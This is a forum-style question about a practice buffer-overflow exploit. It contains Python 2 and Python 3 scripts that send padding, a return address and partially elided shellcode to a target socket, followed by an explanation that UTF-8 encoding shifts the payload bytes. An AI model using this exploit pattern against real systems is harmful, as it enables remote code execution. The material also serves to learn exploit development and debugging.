I'm practicing some buffer-overflow techniques and
I came across an odd issue with sending socket data.
I have these two almost identical pieces of code, except
that in the Python 3 code I changed the sock.send to encode the
string (in Python 2 you don't need that).
Python 2 code:
import socket, sys

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((sys.argv[1], 10000))

buffer = "A" * 268                 # padding
buffer += "\x70\xfb\x22\x00"       # value expected to land in EIP
#PAYLOAD:
buffer += ("\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
           "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
           # ... (rest of the shellcode elided in the original post)
           "\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5")
sock.send(buffer)                  # Python 2 str is already a byte string
sock.close()                       # close() must be called, not just referenced
Python 3 code:
import socket, sys

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((sys.argv[1], 10000))

buffer = "A" * 268                 # padding
buffer += "\x70\xfb\x22\x00"       # value expected to land in EIP
#PAYLOAD:
buffer += ("\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
           "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
           # ... (rest of the shellcode elided in the original post)
           "\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5")
sock.send(buffer.encode())         # str.encode() with no argument uses UTF-8
sock.close()                       # close() must be called, not just referenced
I send the buffer and then check the EIP/ESP values with Immunity Debugger,
and I see that I'm getting different values between the Python 2 code and the
Python 3 code. How is that possible??
The buffer is the same in both of them, so the EIP/ESP in the debugger should be the same.
In other words, from the server's point of view (which gets the socket data)
it looks like it gets a different data structure or something like that.
Any ideas?
Thanks.
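The following is an added example, not code from the post above, that makes the difference between the two scripts observable without a debugger. It builds the same layout the post uses (268 bytes of padding, the 4-byte value 70 fb 22 00, and the three shellcode fragments that are visible on the page; the elided middle of the shellcode is left out, which does not change the effect), encodes it the way the Python 3 script does, and compares that with a byte-for-byte equivalent built from bytes literals. It pushes both through a local socket.socketpair() so the comparison is on what a receiving side actually gets. The sample data is constructed from the bytes shown in the post; the helper names are my own.

```python
import socket
import struct

# Constructed sample, copied from the layout in the post: 268 bytes of padding,
# a 4-byte return address, then the shellcode fragments visible on the page.
# The post elides the middle of the shellcode with "...", so only the visible
# fragments are used here; the encoding effect is identical.
PADDING = "A" * 268
RET_ADDR = "\x70\xfb\x22\x00"
SHELLCODE_FRAGMENTS = (
    "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
    "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
    "\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5"
)


def build_str_buffer():
    """The buffer exactly as the Python 3 script builds it: a text str."""
    return PADDING + RET_ADDR + SHELLCODE_FRAGMENTS


def encode_buffer(codec="utf-8"):
    """What sock.send(buffer.encode()) puts on the wire.

    str.encode() with no argument uses UTF-8, so every code point >= 0x80
    (for example U+00FB in the return address) becomes a two-byte sequence.
    With codec="latin-1" each code point 0..255 maps to exactly one byte.
    """
    return build_str_buffer().encode(codec)


def build_bytes_buffer():
    """Python 3 equivalent of the Python 2 str: bytes literals, never str.

    struct.pack("<I", 0x0022fb70) is the little-endian form of the same
    four bytes the post writes as "\\x70\\xfb\\x22\\x00".
    """
    return (b"A" * 268
            + struct.pack("<I", 0x0022fb70)
            + SHELLCODE_FRAGMENTS.encode("latin-1"))


def first_divergence(a, b):
    """Offset of the first byte where two payloads differ, or None if equal."""
    for i, (x, y) in enumerate(zip(a, b)):
        if x != y:
            return i
    return None if len(a) == len(b) else min(len(a), len(b))


def return_address_on_wire(payload):
    """The four bytes that occupy the return-address slot (offset 268..271)."""
    return payload[268:272]


def send_through_socket(payload):
    """Send the payload over a local socket pair and return what the
    receiving end sees, so the comparison is on received bytes."""
    sender, receiver = socket.socketpair()
    try:
        sender.sendall(payload)
        sender.shutdown(socket.SHUT_WR)
        chunks = []
        while True:
            chunk = receiver.recv(4096)
            if not chunk:
                break
            chunks.append(chunk)
        return b"".join(chunks)
    finally:
        sender.close()
        receiver.close()


if __name__ == "__main__":
    utf8_seen = send_through_socket(encode_buffer())
    bytes_seen = send_through_socket(build_bytes_buffer())
    print("str.encode() (UTF-8) length :", len(utf8_seen))
    print("bytes buffer length         :", len(bytes_seen))
    print("first differing offset      :", first_divergence(utf8_seen, bytes_seen))
    print("return address slot, UTF-8  :", return_address_on_wire(utf8_seen).hex())
    print("return address slot, bytes  :", return_address_on_wire(bytes_seen).hex())
```

The key check is first_divergence(): the two payloads agree through the padding and the first address byte (0x70) and then split at offset 269, where 0xfb has become the two bytes c3 bb. From the receiving side's point of view the return-address slot therefore holds 70 c3 bb 22 instead of 70 fb 22 00, and every later byte is shifted by the number of high bytes that precede it, which is exactly the symptom of different EIP/ESP values between the two scripts.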